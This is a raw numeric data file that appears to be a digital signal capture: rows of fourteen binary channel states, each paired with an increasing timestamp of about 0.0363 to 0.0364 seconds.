1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279288e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279312e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6279316e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6279364e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6279388e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279396e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279412e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279436e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279460e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279488e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279512e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279540e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279564e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279588e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279612e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279636e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279660e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279688e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6279692e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6279740e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6279764e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279788e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279812e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279836e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279860e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279888e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279912e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279940e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6279964e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6279988e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280012e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280088e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280112e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280140e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280164e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280188e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280212e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280260e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6280268e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6280316e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6280340e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280348e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280364e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280388e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280412e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280436e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280460e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280488e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280512e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280540e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280564e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280588e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280612e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280636e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280660e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280688e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280712e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280740e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280764e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280788e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280812e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280836e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280888e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280912e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6280916e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.6280940e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.6280964e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6280972e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6280988e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281012e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281088e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281112e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281140e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281164e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281188e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281212e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281236e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281260e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281284e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281308e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281336e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281360e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281388e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281412e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281436e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281460e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281484e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281508e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281536e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281560e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281588e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281612e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281636e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281660e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281684e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281708e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281736e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281760e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281788e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281812e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281836e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281860e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281884e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281908e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281936e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6281960e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6281988e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6282012e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6282036e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6282060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6282092e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6282116e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.6282140e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.6282164e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.6406800e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6406980e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.6406984e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6407004e-02 0,0,1,0,0,0,0,0,0,0,0,1,0,1,3.6407036e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6407060e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6407364e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6407388e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6407412e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6407436e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6407460e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6407484e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,1,3.6407536e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6407560e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,3.6407564e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,1,3.6407588e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,1,3.6407612e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,3.6407620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6407632e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6407636e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6407660e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6407684e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6407708e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6407716e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6407764e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6407788e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6407796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6407812e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6407836e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6407884e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6407916e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6407960e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6407988e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408036e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408060e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408084e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408112e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408136e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408160e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6408164e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6408212e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6408236e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408260e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408284e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408308e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408336e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408360e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408388e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408412e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408436e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408460e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408484e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408508e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408536e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408560e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408588e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408612e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408636e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408660e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408684e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408736e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408760e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6408764e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6408788e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6408812e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408820e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408836e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408860e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408884e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408908e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408936e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6408960e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6408988e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409016e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409040e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409068e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409116e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409140e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409164e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409216e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409240e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409264e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409292e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409316e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409320e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6409364e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409388e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409396e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409416e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409440e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409464e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409492e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409516e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409540e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409548e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6409592e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409616e-02 0,0,1,0,0,1,0,0,0,0,0,0,0,0,3.6409620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409624e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409640e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409664e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409692e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409764e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409788e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409796e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6409816e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409840e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409848e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409864e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409892e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6409940e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6409964e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6409972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6409988e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410016e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410040e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410064e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410092e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410116e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410164e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410188e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410244e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410264e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410316e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410340e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410392e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410416e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410440e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410464e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410492e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410516e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410540e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410564e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410588e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410616e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410640e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410664e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410692e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410716e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410740e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410764e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410788e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410816e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410840e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410864e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6410868e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6410916e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6410940e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6410964e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6410988e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411064e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411116e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411140e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411188e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411216e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411240e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411268e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411292e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411316e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411340e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411364e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411388e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411416e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411440e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6411468e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6411516e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6411540e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411548e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411564e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411588e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411616e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411640e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411668e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411692e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411716e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411820e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411844e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6411852e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6411896e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6411920e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411928e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411948e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6411972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6411996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412068e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412124e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412148e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412172e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412196e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412244e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412268e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412320e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412396e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412420e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412444e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412468e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412496e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412520e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6412524e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6412572e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6412596e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412604e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412668e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412696e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412720e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412796e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412820e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412844e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412868e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412896e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412920e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412948e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6412972e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6412996e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413020e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413044e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413068e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413124e-02 0,0,1,0,0,0,0,0,0,1,0,0,0,0,3.6413148e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6413152e-02 0,0,1,0,0,1,0,0,0,1,0,0,1,0,3.6413172e-02 0,0,1,0,0,1,0,0,0,1,0,0,0,0,3.6413196e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413204e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413268e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413296e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413348e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413372e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413396e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413420e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413472e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413496e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413548e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413572e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413620e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413644e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413668e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413696e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413720e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413748e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413772e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413796e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413820e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413844e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413868e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413896e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413920e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413948e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6413972e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6413996e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414020e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414044e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414068e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414096e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414120e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414148e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414172e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414196e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414220e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414244e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414268e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414296e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414320e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414348e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414372e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414396e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414420e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,0,3.6414444e-02 0,0,1,0,0,0,0,0,0,0,0,0,1,0,3.6414468e-02 